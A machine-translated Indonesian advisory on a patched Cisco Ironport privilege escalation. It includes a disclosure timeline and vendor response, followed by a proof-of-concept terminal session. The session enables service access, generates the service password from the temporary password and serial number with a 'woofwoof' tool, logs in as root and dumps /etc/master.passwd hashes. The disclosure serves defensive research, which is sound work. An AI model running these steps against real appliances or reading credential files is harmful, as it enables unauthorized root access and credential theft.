Diperbarui untuk Linux
Cisco Ironport Appliances Privilege Escalation Vulnerability Vendor: Cisco Product webpage: http://www.cisco.com Affected version(s): Cisco Ironport ESA - AsyncOS 8.5.5-280 Cisco Ironport WSA - AsyncOS 8.0.5-075 Cisco Ironport SMA - Asyncos 8.3.6-0 Tanggal: 22/05/2014 Kredit: Glafkos Charalambous CVE: Tidak Ditugaskan oleh Cisco
Timeline Pengungkapan: 19-05-2014: Pemberitahuan Vendor 20-05-2014: Respons/Umpan Balik Vendor 27-08-2014: Vendor Fix/Patch 24-01-2015: Pengungkapan Publik
Deskripsi: Peralatan Cisco Ironport rentan terhadap eskalasi hak istimewa "admin" yang diautentikasi. Dengan mengaktifkan akun layanan dari GUI atau CLI memungkinkan admin untuk mendapatkan akses root pada alat, oleh karena itu melewati semua batasan akun "admin" yang ada. Kerentanan ini disebabkan oleh implementasi algoritma yang lemah dalam proses pembuatan kata sandi yang digunakan oleh Cisco untuk mengakses alat jarak jauh untuk memberikan dukungan teknis.
Tanggapan Vendor: Seperti yang diperkirakan, ini tidak dianggap sebagai kerentanan tetapi masalah pengerasan keamanan. Karena itu kami tidak menetapkan CVE namun saya memastikan bahwa ini diperbaiki pada SMA, ESA dan WSA. Perbaikan mencakup beberapa perubahan seperti melindungi lebih baik algoritma dalam biner, mengubah algoritma itu sendiri menjadi lebih kuat dan menegakkan kompleksitas kata sandi ketika administrator mengatur kelulusan dan mengaktifkan akun.
[SD] Catatan: Kredensial administratif diperlukan untuk mengaktifkan akses ke perwakilan dukungan dan untuk mengatur frase pass yang digunakan untuk menghitung kata sandi akhir. [GC] Masih Pengguna Admin memiliki izin terbatas pada alat dan kredensial juga dapat dikompromikan, bahkan dengan kata sandi default yang mengarah ke akses root penuh.
[SD] Masalah ini dilacak untuk ESA oleh Cisco Bug ID: CSCUO96011 untuk ID SMA oleh Cisco Bug: CSCUO96056 dan untuk WSA oleh Cisco Bug ID CSCUO90528
Rincian Teknis: Dengan masuk ke alat menggunakan kata sandi default "Ironport" atau pengguna yang ditentukan, ada opsi untuk mengaktifkan akses jarak jauh dukungan pelanggan. Opsi ini dapat ditemukan di bawah bantuan dan dukungan -> akses jarak jauh di GUI atau dengan menggunakan akun CLI Console "Enablediag" dan mengeluarkan layanan komando. Mengaktifkan Layanan ini memerlukan kata sandi pengguna sementara yang harus disediakan bersama dengan nomor seri alat ke Cisco TechSupport untuk menghubungkan dan mengautentikasi dari jarak jauh ke alat.
Memiliki kata sandi sementara dan nomor seri alat dengan mengaktifkan akun layanan, penyerang pada gilirannya dapat mendapatkan akses root penuh serta berpotensi merusaknya, backdoor it, dll.
POC:
root@kali:~# ssh -lenablediag 192.168.0.158
Password:
Last login: Sat Jan 24 15:47:07 2015 from 192.168.0.163
Copyright (c) 2001-2013, Cisco Systems, Inc.
AsyncOS 8.5.5 for Cisco C100V build 280
Welcome to the Cisco C100V Email Security Virtual Appliance
Available Commands:
help -- View this text.
quit -- Log out.
service -- Enable or disable access to the service system.
network -- Perform emergency configuration of the diagnostic network interface.
clearnet -- Resets configuration of the diagnostic network interface.
ssh -- Configure emergency SSH daemon on the diagnostic network interface.
clearssh -- Stop emergency SSH daemon on the diagnostic network interface.
tunnel -- Start up tech support tunnel to IronPort.
print -- Print status of the diagnostic network interface.
reboot -- Reboot the appliance.
S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Access currently disabled.
ironport.example.com> service
Service Access is currently disabled. Enabling this system will allow an
IronPort Customer Support representative to remotely access your system
to assist you in solving your technical issues. Are you sure you want
to do this? [Y/N]> Y
Enter a temporary password for customer support to use. This password may
not be the same as your admin password. This password will not be able
to be used to directly access your system.
[]> cisco123
Service access has been ENABLED. Please provide your temporary password
to your IronPort Customer Support representative.
S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Access currently ENABLED (0 current service logins)
ironport.example.com>
gcc -std=99 -o woofwoof woofwoof.c -lcrypto
./woofwoof
Usage: woofwoof.exe -p password -s serial
-p <password> | Cisco Service Temp Password
-s <serial> | Cisco Serial Number
-h | This Help Menu
Example: woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4
./woofwoof -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019
F508A4
Service Password: b213c9a4
root@kali:~# ssh -lservice 192.168.0.158
Password:
Last login: Wed Dec 17 21:15:24 2014 from 192.168.0.10
Copyright (c) 2001-2013, Cisco Systems, Inc.
AsyncOS 8.5.5 for Cisco C100V build 280
Welcome to the Cisco C100V Email Security Virtual Appliance
# uname -a
FreeBSD ironport.example.com 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Fri Mar 14 08:04:05 PDT 2014 [email protected]:/usr/build/iproot/freebsd/mods/src/sys/amd64/compile/MESSAGING_GATEWAY.amd64 amd64
# cat /etc/master.passwd
# $Header: //prod/phoebe-8-5-5-br/sam/freebsd/install/dist/etc/master.passwd#1 $
root:*:0:0::0:0:Mr &:/root:/sbin/nologin
service:$1$bYeV53ke$Q7hVZA5heeb4fC1DN9dsK/:0:0::0:0:Mr &:/root:/bin/sh
enablediag:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:999:999::0:0:Administrator support access control:/root:/data/bin/enablediag.sh
adminpassword:$1$aDeitl0/$BlmzKUSeRXoc4kcuGzuSP/:0:1000::0:0:Administrator Password Tool:/data/home/admin:/data/bin/adminpassword.sh
daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5::0:0:System &:/:/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin
support:$1$FgFVb064$SmsZv/ez7Pf4wJLp5830s/:666:666::0:0:Mr &:/root:/sbin/nologin
admin:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:1000:1000::0:0:Administrator:/data/home/admin:/data/bin/cli.sh
clustercomm:*:900:1005::0:0:Cluster Communication User:/data/home/clustercomm:/data/bin/command_proxy.sh
smaduser:*:901:1007::0:0:Smad User:/data/home/smaduser:/data/bin/cli.sh
spamd:*:783:1006::0:0:CASE User:/usr/case:/sbin/nologin
pgsql:*:70:70::0:0:PostgreSQL pseudo-user:/usr/local/pgsql:/bin/sh
ldap:*:389:389::0:0:OpenLDAP Server:/nonexistent:/sbin/nologin